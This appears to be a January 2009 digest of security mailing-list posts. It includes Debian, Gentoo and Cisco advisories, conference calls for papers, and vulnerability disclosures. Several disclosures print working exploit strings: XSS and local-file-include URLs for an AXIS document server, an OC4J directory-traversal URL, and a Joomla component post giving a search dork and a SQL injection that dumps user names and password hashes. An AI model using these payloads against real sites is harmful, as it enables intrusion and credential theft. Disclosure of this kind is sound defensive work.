[SECURITY] [DSA 1693-2] New phppgadmin packages fix regression
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1693-2 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst January 21, 2009 http://www.debian.org/security/faq - Package     : phppgadmin Vulnerability  : several Problem type  : remote Debian-specific: no CVE Id(s)    : CVE-2007-2865 CVE-2007-5728 CVE-2008-5587 Debian Bugs   : 427151 449103 508026 The security update for phpPgAdmin in DSA-1693-1 caused a regression in modifying table fields. This updates corrects that flaw. For reference the original advisory follows. Several remote vulnerabilities have been discovered in phpPgAdmin, a tool to administrate PostgreSQL database over the web. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2007-2865   Cross-site scripting vulnerability allows remote attackers to inject   arbitrary web script or HTML via the server parameter. CVE-2007-5728   Cross-site scripting vulnerability allows remote attackers to inject   arbitrary web script or HTML via PHP_SELF. CVE-2008-5587   Directory traversal vulnerability allows remote attackers to read   arbitrary files via _language parameter. For the stable distribution (etch), these problems have been fixed in version 4.0.1-3.1etch2. We recommend that you upgrade your phppgadmin package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch2.dsc Size/MD5 checksum: 890 a20ab5b499af2fa4393a344fd05641bb http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch2.diff.gz Size/MD5 checksum:15892 0d10507c0d6abf870c8cb4d29515d928 http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1.orig.tar.gz Size/MD5 checksum: 703673 eedac65ce5d73aca2f92388c9766ba1b Architecture independent packages: http://security.debian.org/pool/updates/main/p/phppgadmin/phppgadmin_4.0.1-3.1etch2_all.deb Size/MD5 checksum: 704442 3449706caa8d61016aaf3a9cb9676ffb These files will probably be moved into the stable distribution on its next update. - - For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-annou...@lists.debian.org Package info: `apt-cache show pkg' and http://packages.debian.org/pkg -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.6 (GNU/Linux) iQEVAwUBSXb2JSIIoQCMVaAcAQKIgwgAhedxjMYlT53fsZ7mZvQ5y6ERp8NoKDAW usnyegZyIK3L9+erVn0Nho+JEjunviajlq4M6y/Mg6sYdEkgnPOAGA8GSzFc+Gaz mIGgFNdFKyq7hPzadlGv+hjD9M8Mf9ZyKfQCoX6TqKnMqLAQRwxbiCaJni4EbhhN Vvh4mG1Ki6FVvR+mLMLBFBRLGz/pevLkdunl45gF/u1Uua9O7ZsINvsZCpIp9Azg DXsxGlJbt8c0qJyJsGKkkoao0aX6NTQVf/0pfdDW3vhUwjuLUisG1QdnGI+KdMoy gekHF9BLSliLFOq3H0C6EsLkdO2Dm84LnUuqzx7/9EDpxQv82Nu73g== =kucF -END PGP SIGNATURE-
[SECURITY] [DSA 1709-1] New shadow packages fix privilege escalation
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - Debian Security Advisory DSA-1709-1 secur...@debian.org http://www.debian.org/security/ Thijs Kinkhorst January 21, 2009 http://www.debian.org/security/faq - Package: shadow Vulnerability : race condition Problem type : local Debian-specific: no CVE Id(s) : CVE-2008-5394 Debian Bug : 505271 Paul Szabo discovered that login, the system login tool, did not correctly handle symlinks while setting up tty permissions. If a local attacker were able to gain control of the system utmp file, they could cause login to change the ownership and permissions on arbitrary files, leading to a root privilege escalation. For the stable distribution (etch), this problem has been fixed in version 4.0.18.1-7+etch1. For the unstable distribution (sid), this problem has been fixed in version 4.1.1-6. We recommend that you upgrade your shadow package. Upgrade instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 4.0 alias etch - --- Source archives: http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1.orig.tar.gz Size/MD5 checksum: 2354234 3f54eaa3a35e7c559f4def92e9957581 http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.diff.gz Size/MD5 checksum: 297817 b78d9d738765da65a6b55dea102569c3 http://security.debian.org/pool/updates/main/s/shadow/shadow_4.0.18.1-7+etch1.dsc Size/MD5 checksum: 1406 ec01ac54e482ea552fdae5753d6c1745 alpha architecture (DEC Alpha) http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_alpha.deb Size/MD5 checksum: 810680 329e1cd5ad019d3984411b1a8a5c77ad http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_alpha.deb Size/MD5 checksum: 943992 76690a44c565b4594892bab69eaf7e30 amd64 architecture (AMD x86_64 (AMD64)) http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_amd64.deb Size/MD5 checksum: 867696 4ce4e2f7884cd883729123163930b9dc http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_amd64.deb Size/MD5 checksum: 806412 3a6171d83a4b79846fe4831b02007a4b arm architecture (ARM) http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_arm.deb Size/MD5 checksum: 778766 df6126b8cd29de54831976a24d28589e http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_arm.deb Size/MD5 checksum: 791770 a9e7b122a8f9a7944bfc91b7cec77554 hppa architecture (HP PA RISC) http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_hppa.deb Size/MD5 checksum: 847846 8562b322610062eb31689e467d80ff7c http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_hppa.deb Size/MD5 checksum: 804082 af4a3f06a93be5cea7dd7dfeed8eed1b i386 architecture (Intel ia32) http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_i386.deb Size/MD5 checksum: 792460 82c630b2f4e18217170a73a2dab27cba http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_i386.deb Size/MD5 checksum: 796578 439cd50477db064cdf11d9b48c0e9af0 ia64 architecture (Intel ia64) http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_ia64.deb Size/MD5 checksum: 1048736 79434b796109c1565f0f0be3cb8d06f0 http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_ia64.deb Size/MD5 checksum: 826456 13df2a0a071f407c84b25ae3ed6077bc mips architecture (MIPS (Big Endian)) http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mips.deb Size/MD5 checksum: 804530 0523d4220e9cb7e8b2342a0a33c1e989 http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mips.deb Size/MD5 checksum: 899612 597b58ea81e074bae374b412f28e1252 mipsel architecture (MIPS (Little Endian)) http://security.debian.org/pool/updates/main/s/shadow/passwd_4.0.18.1-7+etch1_mipsel.deb Size/MD5 checksum: 908860 ade3427a1b8b693a098544ac27ae17aa http://security.debian.org/pool/updates/main/s/shadow/login_4.0.18.1-7+etch1_mipsel.deb Size/MD5 checksum: 805100 fd9d9e49cd9b7864b06865c097f0ba08 powerpc architecture (PowerPC)
CfP: 16th ACM Conference on Computer and Communications Security (CCS) 2009
== Call for Papers: 16th ACM Conference on Computer and Communications Security (CCS) 2009 Nov 9 - 13, 2009: Hyatt Regency Chicago, IL, USA http://sigsac.org/ccs/CCS2009 == Important Dates: * Paper Submission due: Monday, April 20th, 2009 * Acceptance notification: Sunday, July 12th, 2009 * Final papers due: Monday, August 17th, 2009 == The annual ACM Computer and Communications Security Conference is a leading international forum for information security researchers, practitioners, developers, and users to explore cutting-edge ideas and results, and to exchange techniques, tools, and experiences. The conference seeks submissions from academia, government, and industry presenting novel research on all practical and theoretical aspects of computer and communications security, as well as case studies and implementation experiences. Papers should have relevance to the construction, evaluation, application, or operation of secure systems. Theoretical papers must make a convincing argument for the practical significance of the results. All topic areas related to computer and communications security are of interest and in scope. Accepted papers will be published by ACM Press in the conference proceedings. Outstanding papers will be invited for possible publication in a special issue of the ACM Transactions on Information and System Security. Paper Submission Process: Submissions must be made by the deadline of April 20, 2009, through the website: http://www.easychair.org/conferences/?conf=ccs2009. Submitted papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal, conference or workshop. Simultaneous submission of the same work is not allowed. Authors of accepted papers must guarantee that their papers will be presented at the conference. Paper Format: Submissions must be at most ten pages in double-column ACM format (note: pages must be numbered), excluding the bibliography and well-marked appendices and at most 12 pages overall. All submissions must be anonymized (an author's name should only occur in references to that author's related work, which should be referenced in the third person and not overtly distinguishable from the referenced work of others). Only PDF or Postscript files will be accepted. Submissions not meeting these guidelines risk rejection without consideration of their merits. Tutorial Submissions: Proposals for long (3-hour) and short (1.5-hour) tutorials on research topics of current and emerging interest should be submitted electronically to the tutorials chair by May 25, 2009. The guidelines for tutorial proposal can be found on the website. Conference Website Additional information and this call for papers can be found at: http://sigsac.org/ccs/CCS2009 General Chair: Ehab Al-Shaer (DePaul University, USA) Program Chairs: Somesh Jha (University of Wisconsin, USA) Angelos D. Keromytis (Columbia U Symantec Research Labs Europe) Tutorial Chair: Ninghui Li (Purdue University, USA) Workshops Chair: Ting Yu (Purdue University, USA) Treasurer: Sencun Zhu (Penn State University, USA) Publication Chair: Hao Chen (UC Davis, USA) Web Chair: Peng Liu (Penn State University, USA) Student Travel Grant Chair: Angelos Stavrou (George Mason U, USA) Publicity Chairs: Christopher Kruegel (UC Santa Barbara, USA) Elena Ferrari (University of Insubria, Italy) Posters Demos Co-Chairs: Nikita Borisov (University of Illinois, USA) Xinming Ou (Kansas State U, USA) Patron Co-Chairs: Peng Ning (North Carolina State U., USA) Nasir Memon (Polytechnic Inst. of NYU, USA) Gail-Joon Ahn (Arizona State Univ., USA) Local Arrangements Committee: Yan Chen (Northeastern University, USA) V.N. Venkatakrishnan, (U. of Illinois, USA) Tricha Anjali (Illinois Inst. of Tech., USA) Jean-Philippe Labruyere (DePaul U., USA) Regional Arrangement Committee: XiaoFeng Wang (Indiana Univ., USA) Cristina Nita-Rotaru (Purdue Univ., USA) Alex Liu (Michgan State Univ., USA) Nikita Borisov (University of Illinois, USA) Technical Program Committee: Martin Abadi (UC Santa Cruz Microsoft, USA) Kostas Anagnostakis (I2R/A-STAR, Singapore) Kosta Beznosov (U British Columbia, Canada) Dan Boneh (Stanford University, USA) Steve Borbash (Department of Defense, USA) Jean Camp (Indiana University, USA) Iliano Cervesato (Carnegie Mellon Univ., USA) Mihai Christodorescu (IBM Research, USA) Debra Cook (IDA-CCS, USA) Lorrie Cranor (Carnegie Mellon Univ., USA) Weidong Cui (Microsoft Research, USA) Marc Dacier (Symantec, France) George Danezis (Microsoft Research, UK) Claudia Diaz (KU Leuven, Belgium) Sven Dietrich (Stevens Inst. of Tech., USA) Wenliang Du (Syracuse University, USA) Matt Edman (Rensselaer Polytechnic Inst., USA) Simone Fischer-Huebner (Karlstads U,
[DSECRG-09-004] AXIS 70U Network Document Server - Privilege Escalation and XSS
Digital Security Research Group [DSecRG] Advisory #DSECRG-09-004
AXIS 70U Network Document Server - Privilege Escalation and XSS
http://dsecrg.com/pages/vul/show.php?id=60
Application:AXIS 70U Network Document Server (Web Interface)
Versions Affected: 3.0
Vendor URL: http://www.axis.com/
Bug:Local File Include and Privilege Escalation,
Multiple Linked XSS
Exploits: YES
Reported: 20.10.2008
Vendor response:20.10.2008
Last response: 02.01.2009
Vendor Case ID: 143027
Solution: NONE
Date of Public Advisory:19.01.2009
Authors:Digital Security Research Group [DSecRG]
(research [at] dsec [dot] ru)
Description
***
Vulnerabilities found in Web Interface of device AXIS 70U Network Document
Server.
1. Local File Include and Privilege Escalation.
Standard user can escalate privileges to administrator.
2. Multiple Linked XSS vulnerabilities
Details
***
1. Local File Include and Privilege Escalation.
Local File Include vulnerability found in script user/help/help.shtml
User can unclude any local files even in admin folder.
Example:
http://[server]/user/help/help.shtml?/admin/this_server/this_server.shtml
2. Multiple Linked XSS vulnerabilities
Linked XSS vulnerability found in scripts:
user/help/help.shtml
user/help/general_help_user.shtml
Attacker can inject XSS script in URL.
Example:
http://[server]/user/help/help.shtml?scriptalert('DSecRG XSS')/script
http://[server]/user/help/general_help_user.shtml?scriptalert('DSecRG
XSS')/script
Solution
Vendor decided that this vulnerability is not critical and there is no
patches for this firmware. But maybe he will patch issues on the next firmware
release
Vendore response:
[13.01.2009]: We don't see any major vulnerability issues with the current
firmware of Axis 70U but we will consider the mentioned issues on the next
firmware release.
About
*
Digital Security is leading IT security company in Russia, providing
information security consulting, audit and penetration testing services, risk
analysis and ISMS-related services and certification for ISO/IEC 27001:2005 and
PCI DSS standards. Digital Security Research Group focuses on web application
and database security problems with vulnerability reports, advisories and
whitepapers posted regularly on our website.
Contact:research [at] dsec [dot] ru
http://www.dsecrg.com
http://www.dsec.ru
Cisco Security Advisory: Cisco Security Manager Vulnerability
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Security Manager Vulnerability Advisory ID: cisco-sa-20090121-csm http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml Revision 1.0 For Public Release 2009 January 21 1600 UTC (GMT) - - Summary === Cisco Security Manager contains a vulnerability when it is used with Cisco IPS Event Viewer (IEV) that results in open TCP ports on both the Cisco Security Manager server and IEV client. An unauthenticated, remote attacker could leverage this vulnerability to access the MySQL databases or IEV server. Cisco has released free software updates that address this vulnerability. A workaround is also available to mitigate this vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20090121-csm.shtml Affected Products = Vulnerable Products +-- All 3.1 and 3.2 versions prior to 3.2.2 of Cisco Security Manager are affected by this vulnerability. Cisco IEV is installed with Cisco Security Manager by default, but the vulnerability is not exposed until IEV has been launched. Products Confirmed Not Vulnerable + The following products have been confirmed not vulnerable: * Cisco Security Manager 3.2.2 * Cisco Security Manager 3.0.x and earlier * Standalone implementations of Cisco IEV * Cisco IPS Manager Express No other Cisco products are currently known to be affected by this vulnerability. Details === Cisco Security Manager is an enterprise-class management application that is designed to configure firewall, VPN, and intrusion prevention security services on Cisco network and security devices. As part of Cisco Security Manager installation, the Cisco IEV is installed by default. The IEV is a Java-based application that allows users to view and manage alerts for up to five sensors, including the ability to report top alerts, attackers, and victims over a specified number of hours or days. Users can connect to and view alerts in real time or via imported log files, configure filters and views to help manage alerts, and import and export event data for further analysis. A vulnerability exists in the Cisco Security Manager server. When the IEV is launched, it opens several remotely available TCP ports on the Cisco Security Manager server and client. These ports could allow remote, unauthenticated root access to the IEV database and server. When IEV is closed, it closes open ports on the Cisco Security Manager client that launched the IEV but fails to close open ports on the server. If the IEV has never been used on the system, the Cisco Security Manager server is not vulnerable. The IEV database contains events that are collected from Cisco Intrusion Prevention System (IPS) devices. The IEV server allows an unauthenticated user to add, delete, or modify the devices that are added into the IEV. This vulnerability is documented in Cisco Bug ID: CSCsv66897 This vulnerability have been assigned the Common Vulnerabilities and Exposures (CVE) identifiers CVE-2008-3820. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at http://intellishield.cisco.com/security/alertmanager/cvss CSCsv66897: Cisco Security Manager/IEV: TCP Ports open for remote connection without any authentication CVSS Base Score - 8.8 Access Vector - Network Access Complexity - Medium Authentication - None Confidentiality Impact - Complete Integrity Impact- Complete Availability Impact - None CVSS Temporal Score - 7.3 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact == Successful exploitation of this vulnerability may result in remote root access to the IEV database or to the IEV Server. Upon launching the IEV remotely accessible ports are opened on the Cisco Security Manager server and the client where the IEV is launched. When the IEV application is closed these ports are subsequently closed on the client however remain open on the Cisco Security Manager server
Cisco Security Advisory: Cisco Unified Communications Manager CAPF Denial of Service Vulnerability`
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: Cisco Unified Communications Manager CAPF Denial of Service Vulnerability Advisory ID: cisco-sa-20090121-cucmcapf Revision 1.0 For Public Release 2009 January 21 1600 UTC (GMT) +- Summary === Cisco Unified Communications Manager, formerly Cisco CallManager, contains a denial of service (DoS) vulnerability in the Certificate Authority Proxy Function (CAPF) service. Exploitation of this vulnerability could cause an interruption in voice services. The CAPF service is disabled by default. Cisco has released free software updates that address this vulnerability. Workarounds available that mitigate this vulnerability are available. This advisory is posted at: http://www.cisco.com/warp/public/707/cisco-sa-20090121-cucmcapf.shtml Affected Products = Vulnerable Products +-- These products are vulnerable: * Cisco Unified Communications Manager 5.x versions prior to 5.1(3e) * Cisco Unified Communications Manager 6.x versions prior to 6.1(3) Administrators of systems that are running Cisco Unified Communications Manager versions 5.x and 6.x can determine the software version by viewing the main page of the Cisco Unified Communications Manager Administration interface. The software version can also be determined by running the command show version active by way of the command line interface (CLI). Products Confirmed Not Vulnerable + Cisco Unified Communications Manager version 4.x and Cisco Unified Communications Manager Express are not affected by this vulnerability. No other Cisco products are currently known to be affected by this vulnerability. Note: Cisco Unified Communications Manager 7.0(1) shipped with the software fix for this vulnerability and is not affected. Details === The CAPF service of Cisco Unified Communications Manager versions 5.x and 6.x contain a vulnerability when handling malformed input that may result in a DoS condition. The CAPF service is disabled by default; however, if it is enabled, the CAPF service listens by default on TCP port 3804 and the listening port is configurable by the user. There is a workaround for this vulnerability. This vulnerability is fixed in Cisco Unified Communications Manager versions 5.1(3e) and 6.1(3). This vulnerability is documented in Cisco Bug ID CSCsq32032 and has been assigned Common Vulnerabilities and Exposures (CVE) identifier CVE-2009-0057. Vulnerability Scoring Details = Cisco has provided scores for the vulnerabilities in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0. CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response. Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks. Cisco has provided an FAQ to answer additional questions regarding CVSS at: http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at: http://intellishield.cisco.com/security/alertmanager/cvss CSCsq32032 - CAPF DoS when client terminates prematurely CVSS Base Score - 7.8 Access Vector - Network Access Complexity - Low Authentication - None Confidentiality Impact - None Integrity Impact- None Availability Impact - Complete CVSS Temporal Score - 6.4 Exploitability - Functional Remediation Level - Official-Fix Report Confidence - Confirmed Impact == Successful exploitation of the vulnerability described in this advisory may result in the interruption of voice services. Software Versions and Fixes === When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution. In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance. Cisco Unified Communications Manager version 5.1(3e) contains the fix for this vulnerability and can be downloaded here: http://tools.cisco.com/support/downloads/go/ReleaseType.x?optPlat=nullisPlatform=Ymdfid=280735907sftType=Unified%20Communications%20Manager%20UpdatestreeName=Voice%20and%20Unified%20CommunicationsmodelName=Cisco%20Unified
Joomla component beamospetition 1.0.12 Sql Injection
Joomla component beamospetition 1.0.12 Sql Injection / Xss
Author : vds_s
Dork : Powered by beamospetition 1.0.12
Dl : http://joomlacode.org/gf/project/beamospetition/
Xss :
http://[site]/?option=com_beamospetitionfunc=signpet='scriptalert('Xss')/script
Sql Injection :
http://[site]/?option=com_beamospetitionfunc=signmpid=-'%20union%20select%200,1,username,password,4,5,6,7,8,9,10,11,12,13,14,15%20from%20jos_users/*
Re: [Full-disclosure] Oracle Containers For Java Directory Traversal (OC4J) Oracle Application Server 10g (10.1.3.1.0) Oracle HTTP Server
Eduardo Vela wrote: Probably one of this are the vulnerabilty descriptions of the bugs: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5460 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4017 Looks to be an exact match with http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 Note that although initially reported as a Tomcat vulnerability, the root cause is a JVM bug. Mark If it's the same issue, Oracle didn't contacted me to notify me about it.. if it is that bug, then it could be fixed via: https://support.bea.com/application_content/product_portlets/securityadvisories/2810.html or in that case http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html Greetings!! -- Eduardo http://www.sirdarckcat.net/ On Mon, Jan 19, 2009 at 10:56 PM, Eduardo Vela sirdarck...@gmail.comwrote: Server Version Info: Oracle-Application-Server-10g/10.1.3.1.0 Oracle-HTTP-Server PoC: http://OC4J/web-app/foobar/%c0%ae%c0%ae/WEB-INF/web.xml Related: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938 Explaination: The %c0%ae%c0%ae is interpreted as: .. because on Java's side: %c0%ae is interpreted as: \uC0AE that get's casted to an ASCII-LOW char, that is: .. You can read dangerous configuration information including passwords, users, paths, etc.. Discovered: 8/16/08 Vendor contacted: 8/16/08 Vendor response: 8/18/08 Vendor reproduced the issue: 9/10/08 Vendor last contact: 9/30/08 Public Disclosure: 1/19/09 Oracle security bug id: 7391479 For more information contact Oracle Security Team: secalert...@oracle.com I really wanted to give a link to a patch, but I think it's better if this is known by sysadmins so they can filter this using an IDS. Greetings!! -- Eduardo http://www.sirdarckcat.net/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Digital Security opens a site of its research center DSec Research Group
Digital Security opens a site of its research center DSec Research Group Digital Security opens a site of its research center DSec Research Group [DSecRG], the main mission of which is to conduct researches of different application and system vulnerabilities. The result of this work is then used by the experts of the Digital Security audit department for assessing the security level of information systems with the use of active audit methods and also while carrying out penetration tests. Data about the vulnerabilities found by DSecRG experts is published in SecurityFocus mailing lists, Milw0rm.com portal and now it is available at DSecRG website ( www.dsecrg.com ) in the form of advisories and whitepapers. Digital Security Research Group __ DIGITAL SECURITY phone: +7 812 703 1547 +7 812 430 9130 e-mail: resea...@dsec.ru www.dsecrg.com www.dsec.ru --- This message and any attachment are confidential and may be privileged or otherwise protected from disclosure. If you are not the intended recipient any use, distribution, copying or disclosure is strictly prohibited. If you have received this message in error, please notify the sender immediately either by telephone or by e-mail and delete this message and any attachment from your system. Correspondence via e-mail is for information purposes only. Digital Security neither makes nor accepts legally binding statements by e-mail unless otherwise agreed. ---
[ GLSA 200901-14 ] Scilab: Insecure temporary file usage
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200901-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Scilab: Insecure temporary file usage Date: January 21, 2009 Bugs: #245922 ID: 200901-14 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis An insecure temporary file usage has been reported in Scilab, allowing for symlink attacks. Background == Scilab is a scientific software package for numerical computations. Affected packages = --- Package / Vulnerable / Unaffected --- 1 sci-mathematics/scilab 4.1.2-r1 = 4.1.2-r1 Description === Dmitry E. Oboukhov reported an insecure temporary file usage within the scilink, scidoc and scidem scripts. Impact == A local attacker could perform symlink attacks to overwrite arbitrary files with the privileges of the user running the application. Workaround == There is no known workaround at this time. Resolution == All Scilab users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose =sci-mathematics/scilab-4.1.2-r1 References == [ 1 ] CVE-2008-4983 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4983 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200901-14.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to secur...@gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2009 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 signature.asc Description: OpenPGP digital signature
[IMF 2009] Call for Papers
Dear all, for your information. Please excuse possible cross postings. CALL FOR PAPERS IMF 2009 5th International Conference on IT Security Incident Management IT Forensics September 15th - 17th, 2009 Stuttgart, Germany CONFERENCE BACKGROUND = Information and communication technology is more and more becoming an integral and in most cases even a vital part of life. The worldwide economy, public administration, health care, education and even personal life depend on working IT. Constriction of the availability of its service, loss of confidentiality or alteration of data processed, or loss of integrity of the IT infrastructure usually lead to serious or disastrous consequences. Hence security plays an increasingly important role for operators and users of IT systems and infrastructures. The establishment of static security measures like policies, standards, and guidelines slowly but steadily is getting more common amongst IT operators. Nevertheless in the vast majority of cases operators do not have the capability to detect and respond to security incidents or do a forensic analysis of its traces that can be used in a lawsuit. Jurisdiction in most countries is starting to change and applies regulations on legal duty to maintain safety on operators of IT. Hence incident response capabilities become indispensable to avoid successful assertion of claims for damages caused by compromised or misused systems. CONFERENCE GOALS IMF's intent is to gather experts from throughout the world in order to present and discuss recent technical and methodical advances in the fields of IT security incident response and management and IT forensics. The conference provides a platform for collaboration and exchange of ideas between industry, academia, law-enforcement and other government bodies. CONFERENCE TOPICS = The scope of IMF 2009 is broad and includes, but is not limited to the following areas: IT Incident Response * Procedures and Methods of Incident Response * Formats and Standardization for Incident Response * Tools Supporting Incident Response * Incident Analysis * CERTs/CSIRTs * Sources of Information, Information Exchange, Communities * Dealing with Vulnerabilities (Vulnerability Response) * Monitoring and Early Warning * Education and Training * Organizations * Legal Aspects (Jurisdiction, Applicable Laws and Regulations) IT Forensics * Trends and Challenges in IT Forensics * Techniques, Tools in Procedures IT Forensics * Methods for the Gathering, Handling, Processing and Analysis of Digital Evidence * Evidence Protection in IT Environments * Standardization in IT Forensics * Education and Training * Organizations * Legal Aspects (Jurisdiction, Applicable Laws and Regulations) Submission Details == IMF invites to submit full papers of up to 20 pages, presenting novel and mature research results as well as practice papers of up to 20 pages, describing best practices, case studies or lessons learned. Proposal for workshops, discussion and presentation on practical methods and challenges are also welcome. All submissions must be written in English (see below), and either in postscript or PDF format. Authors of accepted papers must ensure that their papers will be presented at the conference. Submitted full papers must not substantially overlap papers that have been published or that are simultaneously submitted to a journal or a conference with proceedings. All submissions will be reviewed by the program committee and papers accepted to be presented at the conference will be included in the conference proceedings. Details on the electronic submission procedure as well as detailed registration information and formatting instructions are provided on the conference web site (http://www.imf-conference.org). Language IMF 2009's scope is international hence all submissions must be written in English. Presentations of accepted papers also must be done in English. Publication --- Accepted papers will be published in IEEE Computer Society's Conference Publishing Series. Each participant of the conference will receive a printed copy. Dates and Deadlines --- The deadline for paper submission is May 18th, 2009. Notification of acceptance will be sent on June 8th, 2009 the latest. You may get your notification earlier than that. Final paper camera ready copy are due to June 19th, 2009. * May 18th, 2009: Deadline for Submissions * June 8th, 2009: Notification of acceptance or rejection * June 19th, 2009: Final paper camera ready copy due * September 15th - 17th, 2009: IMF 2009
